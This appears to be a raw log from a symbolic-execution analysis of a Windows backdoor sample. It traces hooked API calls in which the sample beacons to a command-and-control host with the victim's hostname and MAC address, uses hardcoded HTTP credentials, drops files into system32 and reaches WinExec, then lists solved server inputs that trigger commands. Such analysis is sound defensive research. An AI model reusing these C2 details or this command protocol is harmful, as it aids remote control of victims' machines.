 File initialization completed
 HookSetReg triggered
 HookGetPid triggered
 InterceptVirtualAlloc triggered, ADDRESS: 003c0000
 SkipOtherCreateRemoteThread triggered
 Thread initialization phase finished. Entering the main loop. Hooking internet library functions.
 Intercepted InternetOpenUrlA(0051A608, http://mse.vmnat.com/httpdocs/mm/WIN-R4MEJK3CJAC:52-54-00-12-34-56/Cmwhite, (null), 0x0, 0x84000100, 00000000)
 Intercepted InternetCloseHandle(0051A618)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Owpq4.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A628, 018A3974, 4096, 018A3758)
 Intercepted InternetCloseHandle(0051A628)
 Intercepted InternetCloseHandle(0051A608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Clnpp5.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A628, 018A5F8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 state 0x0x7fd9988148c0 in ECHO command
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A638, 018A5F8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 Updating loopCount of state 0x0x7fd9997d1900 to value: 1
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted InternetReadFile(0051A618, 018A4B8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 Intercepted CreateFileA(C:\Windows\system32\sys32time.ini)
 Intercepted CreateFileA(C:\Windows\system32\ipop.dll)
 Intercepted InternetConnectA(0051A608, mse.vmnat.com, 80, reader, 1qazxsw2, 3, &d, 00000000)
 Intercepted HttpSendRequestA(0051A648, (null), 0, 57494E2D52344D454A4B33434A41433A35322D35342D30302D31322D33342D35362F74737C6B7770716B727D6B777576484F302B2E2B2A322B484F747770777F7571757C484F067F19122C2B212A323619363C36312028767719322C2B262A286
 Intercepted InternetCloseHandle(0051A648)
 Intercepted InternetCloseHandle(0051A608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Clnpp5.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A648, 018A5F8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 state 0x0x7fd998771be0 in ECHO command
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A658, 018A5F8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 Updating loopCount of state 0x0x7fd998e71c70 to value: 2
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted InternetReadFile(0051A618, 018A4B8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Clnpp5.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A688, 018A5F8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 state 0x0x7fd9988148c0 in _real_ command dispatcher
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A698, 018A5F8C, 4096, 018A49EC)
 Intercepted WinExec
(Concat w32 (Extract w8 24 N0:(SExt w32 N1:(Extract w8 0 (Or w32 (And w32 (Xor w32 0x18a4945
(Or w32 (And w32 (ZExt w32 (Read w8 0xa v8_InternetReadFile_8_8))
0xff)
0x71599500))
0xff)
0x71599500))))
(Concat w24 (Extract w8 16 N0)
(Concat w16 (Extract w8 8 N0) N1)))
BaseInstructions: SymbExpression WinExec command - Value: 0x40

 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(0051A618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(0051A698, 018A5F8C, 4096, 018A49EC)
 Intercepted InternetCloseHandle(0051A618)
 Updating loopCount of state 0x0x7fd9985e3200 to value: 3

 *** INPUT *** 
 v0_InternetReadFile_0_0 = {0x5, 0x5, 0x44, 0x75, 0x0, 0x0, 0x75, 0x75, 0x15, 0x7d, 0x75, 0x71, 0x75, 0x61, 0x6c, 0x45, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75}; (string) "..Du..uu.}uqualEuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu"
v1_InternetReadFile_1_1 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v2_InternetReadFile_2_2 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v3_InternetReadFile_3_3 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v4_InternetReadFile_4_4 = {0x5, 0x5, 0x44, 0x75, 0x0, 0x0, 0x75, 0x75, 0x15, 0x7d, 0x75, 0x71, 0x75, 0x61, 0x6c, 0x45, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75}; (string) "..Du..uu.}uqualEuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu"
v5_InternetReadFile_5_5 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v6_InternetReadFile_6_6 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v7_InternetReadFile_7_7 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v8_InternetReadFile_8_8 = {0x5, 0x5, 0x40, 0x5, 0x5, 0x5, 0x5, 0x5, 0x15, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5}; (string) "..@..............................................."
v9_InternetReadFile_9_9 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
v10_InternetReadFile_10_11 = {0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15, 0x15}; (string) ".................................................."
